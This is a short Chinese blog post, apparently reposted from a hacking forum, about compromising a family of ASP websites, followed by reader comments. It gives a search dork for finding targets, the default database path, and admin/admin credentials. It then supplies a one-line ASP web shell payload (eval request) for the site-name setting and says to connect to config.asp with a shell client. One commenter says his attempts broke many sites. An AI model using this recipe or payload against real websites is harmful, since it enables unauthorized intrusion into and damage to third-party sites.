关键词:inurl:showkbxx.asp?id=

有注入点

默认数据库:data/xy#!123.mdb

默认账户和密码:admin admin

有很多网站都是有防注入的,这个时候我们可以下载数据库,然后本地搭建,替换原来的数据库,进行注入得到管理员账户和密码

后台拿shell

有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%'

在里面直接插入,不要删掉网站名称。。。

然后菜刀连接 http://xxxx.com/inc/config.asp 密码你们懂的

转自:http://www.90sec.org/viewthread.php?tid=2543&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

留言评论(旧系统):

leo108 @ 2012-06-16 16:58:05

按这标题,所有ASP的用access数据库的站都有0DAY。应该叫后台拿shell比较合适点。

本站回复:

额,照搬的,我根本没注意……

hocel @ 2012-06-18 16:42:06

"有个网站配置,在网站名称里面直接添加:xxx网站"%><%eval request("stomach")%><%'" 老是插不对,不知道插死了好多网站

本站回复:

要看具体情况,这个只是简单的 Asp 标记闭合,很轻松的……